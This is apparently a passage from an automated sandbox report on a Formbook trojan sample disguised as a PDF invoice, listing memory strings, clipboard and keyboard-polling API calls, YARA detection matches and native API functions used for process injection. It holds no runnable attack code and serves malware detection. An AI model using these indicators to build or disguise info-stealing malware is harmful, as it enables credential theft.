          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1694937333.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4139053792.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C425A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007C4458
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007B0219
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007DCDAC

          E-Banking Fraud

          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Genesis RMS Private Limited November 2024 pdf.exe PID: 7684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00753B4C
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5a075fd7-a
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3d4df871-c
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e84c14f1-c
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e01b7b52-1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A320 NtCreateFile,1_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3D0 NtReadFile,1_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A450 NtClose,1_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A500 NtAllocateVirtualMemory,1_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A31A NtCreateFile,1_2_0041A31A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3CD NtReadFile,1_2_0041A3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A44A NtClose,1_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B60 NtClose,LdrInitializeThunk,1_2_03372B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03372BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AD0 NtReadFile,LdrInitializeThunk,1_2_03372AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F30 NtCreateSection,LdrInitializeThunk,1_2_03372F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FB0 NtResumeThread,LdrInitializeThunk,1_2_03372FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03372F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FE0 NtCreateFile,LdrInitializeThunk,1_2_03372FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03372EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03372E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03372D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03372D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03372DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DD0 NtDelayExecution,LdrInitializeThunk,1_2_03372DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03372CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374340 NtSetContextThread,1_2_03374340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374650 NtSuspendThread,1_2_03374650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BA0 NtEnumerateValueKey,1_2_03372BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B80 NtQueryInformationFile,1_2_03372B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BE0 NtQueryValueKey,1_2_03372BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AB0 NtWaitForSingleObject,1_2_03372AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AF0 NtWriteFile,1_2_03372AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F60 NtCreateProcessEx,1_2_03372F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FA0 NtQuerySection,1_2_03372FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E30 NtWriteVirtualMemory,1_2_03372E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EE0 NtQueueApcThread,1_2_03372EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D00 NtSetInformationFile,1_2_03372D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DB0 NtEnumerateKey,1_2_03372DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C00 NtQueryInformationProcess,1_2_03372C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C70 NtFreeVirtualMemory,1_2_03372C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C60 NtCreateKey,1_2_03372C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CF0 NtOpenProcess,1_2_03372CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CC0 NtQueryVirtualMemory,1_2_03372CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373010 NtOpenDirectoryObject,1_2_03373010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373090 NtSetValueKey,1_2_03373090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033735C0 NtCreateMutant,1_2_033735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033739B0 NtGetContextThread,1_2_033739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D10 NtOpenProcessToken,1_2_03373D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D70 NtOpenThread,1_2_03373D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,1_2_029EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EA042 NtQueryInformationProcess,1_2_029EA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0E614232 NtCreateFile,2_2_0E614232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E615E12 NtProtectVirtualMemory,2_2_0E615E12
          Source: C:\Windows\explorer.exeCode function: 2_2_0E615E0A NtProtectVirtualMemory,2_2_0E615E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C25CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,3_2_00C25CF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C240B1 NtQuerySystemInformation,3_2_00C240B1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C25D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,3_2_00C25D6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C24136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,3_2_00C24136
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04DB2CA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04DB2C70
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2C60 NtCreateKey,LdrInitializeThunk
